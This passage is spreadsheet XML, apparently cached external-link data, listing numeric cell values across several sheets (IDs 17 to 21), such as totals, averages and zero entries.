        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>189.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3131.82</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>25806.88</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>7764.49</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="17">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>3568</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>33351.9799999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>16.25</v>
          </cell>
          <cell r="M6">
            <v>225.75</v>
          </cell>
          <cell r="N6">
            <v>4419.67</v>
          </cell>
          <cell r="O6">
            <v>67.7083333333333</v>
          </cell>
          <cell r="P6">
            <v>58.7890625</v>
          </cell>
          <cell r="Q6">
            <v>52.6151190476191</v>
          </cell>
          <cell r="R6">
            <v>79.2</v>
          </cell>
          <cell r="S6">
            <v>83.5880398671096</v>
          </cell>
          <cell r="T6">
            <v>86.0294999400408</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>11.75</v>
          </cell>
          <cell r="M7">
            <v>194.5</v>
          </cell>
          <cell r="N7">
            <v>4217.08</v>
          </cell>
          <cell r="O7">
            <v>48.9583333333333</v>
          </cell>
          <cell r="P7">
            <v>50.6510416666667</v>
          </cell>
          <cell r="Q7">
            <v>50.2033333333333</v>
          </cell>
          <cell r="R7">
            <v>194.127659574468</v>
          </cell>
          <cell r="S7">
            <v>201.264781491003</v>
          </cell>
          <cell r="T7">
            <v>188.202974570082</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>1127</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>201</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>78</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>2907</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>160</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>223</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3128.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>2010</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>600</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>3496.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>700</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>3844.39399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>938</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1000</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>5015.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>1206</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>45</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>1161</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>2281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3787.39</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>78.67</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>230.157</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>284.5</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>373.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3129.39</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>25800.99</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>7550.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="18">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>3888</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>33673.1899999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>9.75</v>
          </cell>
          <cell r="M6">
            <v>235.5</v>
          </cell>
          <cell r="N6">
            <v>4429.42</v>
          </cell>
          <cell r="O6">
            <v>40.625</v>
          </cell>
          <cell r="P6">
            <v>57.7205882352941</v>
          </cell>
          <cell r="Q6">
            <v>52.5809591642925</v>
          </cell>
          <cell r="R6">
            <v>88.1025641025641</v>
          </cell>
          <cell r="S6">
            <v>83.7749469214437</v>
          </cell>
          <cell r="T6">
            <v>86.0340631504802</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>16.25</v>
          </cell>
          <cell r="M7">
            <v>210.75</v>
          </cell>
          <cell r="N7">
            <v>4233.33</v>
          </cell>
          <cell r="O7">
            <v>67.7083333333333</v>
          </cell>
          <cell r="P7">
            <v>51.6544117647059</v>
          </cell>
          <cell r="Q7">
            <v>50.2532051282051</v>
          </cell>
          <cell r="R7">
            <v>186.4</v>
          </cell>
          <cell r="S7">
            <v>200.11862396204</v>
          </cell>
          <cell r="T7">
            <v>188.19605369768</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>102</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>300</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>2607</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>757</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>402</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>46</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3484.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>1072</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>77</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>4491.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>200</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>3644.39399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>1474</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>2000</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>4489.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>1675</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>99</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>2737</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>3029</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3566.79</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>72.44</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>302.597</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>219.5</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>229</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3118.29</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>25594.2</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>8078.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="19">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>4117</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>32900.7899999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>14.5</v>
          </cell>
          <cell r="M6">
            <v>250</v>
          </cell>
          <cell r="N6">
            <v>4443.92</v>
          </cell>
          <cell r="O6">
            <v>60.4166666666667</v>
          </cell>
          <cell r="P6">
            <v>57.8703703703704</v>
          </cell>
          <cell r="Q6">
            <v>52.6032196969697</v>
          </cell>
          <cell r="R6">
            <v>87.7931034482759</v>
          </cell>
          <cell r="S6">
            <v>84.008</v>
          </cell>
          <cell r="T6">
            <v>86.0398026967182</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>16.25</v>
          </cell>
          <cell r="M7">
            <v>227</v>
          </cell>
          <cell r="N7">
            <v>4249.58</v>
          </cell>
          <cell r="O7">
            <v>67.7083333333333</v>
          </cell>
          <cell r="P7">
            <v>52.5462962962963</v>
          </cell>
          <cell r="Q7">
            <v>50.3027935606061</v>
          </cell>
          <cell r="R7">
            <v>175.015384615385</v>
          </cell>
          <cell r="S7">
            <v>198.321585903084</v>
          </cell>
          <cell r="T7">
            <v>188.145652040908</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>1273</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>402</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>300</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>2709</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>200</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3284.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>603</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>417</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>4677.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>500</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>3144.39399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>1407</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1000</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>4896.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>804</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>548</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>2993</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>2844</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4889.4</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>302.597</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>254.5</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>345.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>4289.4</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>25167.3</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>7733.49</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="20">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>3618</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>32361.7799999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>14.75</v>
          </cell>
          <cell r="M6">
            <v>264.75</v>
          </cell>
          <cell r="N6">
            <v>4458.67</v>
          </cell>
          <cell r="O6">
            <v>61.4583333333333</v>
          </cell>
          <cell r="P6">
            <v>58.0592105263158</v>
          </cell>
          <cell r="Q6">
            <v>52.6283050047214</v>
          </cell>
          <cell r="R6">
            <v>87.3220338983051</v>
          </cell>
          <cell r="S6">
            <v>84.1926345609065</v>
          </cell>
          <cell r="T6">
            <v>86.0440445244882</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>13.5</v>
          </cell>
          <cell r="M7">
            <v>240.5</v>
          </cell>
          <cell r="N7">
            <v>4263.08</v>
          </cell>
          <cell r="O7">
            <v>56.25</v>
          </cell>
          <cell r="P7">
            <v>52.7412280701754</v>
          </cell>
          <cell r="Q7">
            <v>50.319641170916</v>
          </cell>
          <cell r="R7">
            <v>172.592592592593</v>
          </cell>
          <cell r="S7">
            <v>196.877338877339</v>
          </cell>
          <cell r="T7">
            <v>188.09639978607</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>1103</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>83</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>2626</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>185</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>670</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>41</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3913.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>800</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>3877.19</v>
          </cell>
        </row>
        <row r="14">
          <cell r="M14">
            <v>0</v>
          </cell>
          <cell r="N14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Q14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="T14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="D15">
            <v>0</v>
          </cell>
          <cell r="E15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="M15">
            <v>3037.68399999998</v>
          </cell>
          <cell r="N15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>300</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>2844.39399999998</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>700</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>4196.23999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>2546</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>793</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>4746</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>2330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4157.01</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>302.597</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>164</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>298</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3695.01</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>24741.29</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>7620.49</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="21">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>2807</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>31199.6999999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>9.75</v>
          </cell>
          <cell r="M6">
            <v>274.5</v>
          </cell>
          <cell r="N6">
            <v>4468.42</v>
          </cell>
          <cell r="O6">
            <v>40.625</v>
          </cell>
          <cell r="P6">
            <v>57.1875</v>
          </cell>
          <cell r="Q6">
            <v>52.5943973634652</v>
          </cell>
          <cell r="R6">
            <v>95.1794871794872</v>
          </cell>
          <cell r="S6">
            <v>84.5828779599271</v>
          </cell>
          <cell r="T6">
            <v>86.0639778713729</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>9.75</v>
          </cell>
          <cell r="M7">
            <v>250.25</v>
          </cell>
          <cell r="N7">
            <v>4272.83</v>
          </cell>
          <cell r="O7">
